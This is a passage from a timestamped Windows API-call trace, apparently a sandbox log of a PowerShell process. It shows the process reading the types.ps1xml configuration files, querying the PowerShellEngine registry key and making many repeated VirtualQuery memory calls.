(hKey=0x344) returned 0x0 [0099.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0099.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0099.841] GetSystemInfo (in: lpSystemInfo=0x10bf80 | out: lpSystemInfo=0x10bf80*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0099.842] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0099.863] SetErrorMode (uMode=0x1) returned 0x1 [0099.863] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0099.863] GetFileType (hFile=0x344) returned 0x1 [0099.863] SetErrorMode (uMode=0x1) returned 0x1 [0099.863] GetFileType (hFile=0x344) returned 0x1 [0100.607] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.609] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.609] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.610] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.610] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.610] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.610] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.611] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.611] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.613] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.614] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.614] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.615] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.615] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.616] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.616] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.617] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.621] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.621] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.622] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.622] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.623] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.623] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.624] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.624] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.625] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.625] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.626] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.626] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.626] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.627] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.627] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.628] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.637] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.638] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.638] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.639] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.639] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.640] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.640] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.641] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1000, lpOverlapped=0x0) returned 1 [0100.641] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x1b4, lpOverlapped=0x0) returned 1 [0100.641] ReadFile (in: hFile=0x344, lpBuffer=0x2e56408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d2e8, lpOverlapped=0x0 | out: lpBuffer=0x2e56408*, lpNumberOfBytesRead=0x10d2e8*=0x0, lpOverlapped=0x0) returned 1 [0100.641] CloseHandle (hObject=0x344) returned 1 [0100.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0100.642] SetErrorMode (uMode=0x1) returned 0x1 [0100.642] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d260 | out: lpFileInformation=0x10d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0100.643] SetErrorMode (uMode=0x1) returned 0x1 [0100.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0100.643] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d348 | out: phkResult=0x10d348*=0x344) returned 0x0 [0100.644] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d2cc, lpData=0x0, lpcbData=0x10d2c8*=0x0 | out: lpType=0x10d2cc*=0x1, lpData=0x0, lpcbData=0x10d2c8*=0x56) returned 0x0 [0100.644] CoTaskMemAlloc (cb=0x5a) returned 0x2218f0 [0100.644] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d29c, lpData=0x2218f0, lpcbData=0x10d298*=0x56 | out: lpType=0x10d29c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d298*=0x56) returned 0x0 [0100.644] CoTaskMemFree (pv=0x2218f0) [0100.644] RegCloseKey (hKey=0x344) returned 0x0 [0100.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0100.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0107.472] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.492] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.499] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.499] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.500] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.501] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.503] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.523] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.539] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.540] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.540] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.541] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.542] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.542] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.546] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.547] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.555] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.577] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.578] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.579] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.580] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.581] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.582] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.583] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.583] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.591] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.592] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.596] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.596] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.597] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.606] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.614] VirtualQuery (in: lpAddress=0x10c040, lpBuffer=0x10cf00, dwLength=0x30 | out: lpBuffer=0x10cf00*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.616] VirtualQuery (in: lpAddress=0x10c040, lpBuffer=0x10cf00, dwLength=0x30 | out: lpBuffer=0x10cf00*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.616] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.653] VirtualQuery 